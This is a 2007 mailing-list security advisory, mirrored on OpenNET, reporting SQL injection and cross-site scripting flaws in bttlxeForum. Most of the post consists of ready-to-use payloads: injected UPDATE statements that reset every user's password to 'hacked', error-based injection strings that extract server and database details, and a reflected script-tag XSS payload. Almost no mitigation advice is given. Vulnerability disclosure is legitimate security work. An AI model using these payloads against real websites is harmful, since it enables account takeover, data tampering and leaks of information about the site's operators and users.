The OpenNET Project
 
Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY
LINKS NEWS MAN DOCUMENTATION


bttlxeForum Multiple SQL Injection And Cross Site Scripting


<< Previous INDEX Search src / Print Next >>
Date: 9 Dec 2007 01:01:31 -0000
From: [email protected]
To: [email protected]
Subject: bttlxeForum Multiple SQL Injection And Cross Site Scripting
X-Virus-Scanned: antivirus-gw at tyumen.ru

Aria-Security Team
http://Aria-Security.Net
-----------------------------
Discovered By: Mormoroth
Shout outs The-0utlaw for completing the vuln.

I.SQL Injection

http://site.ltd/myaccount/viewProfile.asp?member='update Members set ProfileName='hacked';--
This Changes MemberList...

http://site.ltd/myaccount/viewProfile.asp?member='update Members set Password='hacked';--
changes all the users' password to hacked

myaccount/psswd.asp
has the same problem 

a' or 1=convert(int,@@version)--
a' or 1=convert(int,@@servername)--
a' or 1=convert(int,db_name())--
a' or 1=convert(int,user_name())--
a' or 1=convert(int,system_user)

Might be useful.


II.Cross Site SCripting:
failure.asp?err_txt="><script>alert('Aria-Security.Net')</script>


Adivsory @ http://aria-security.net/forum/forumdisplay.php?f=60
Credits Goes To Aria-Security Team


<< Previous INDEX Search src / Print Next >>



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2025 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру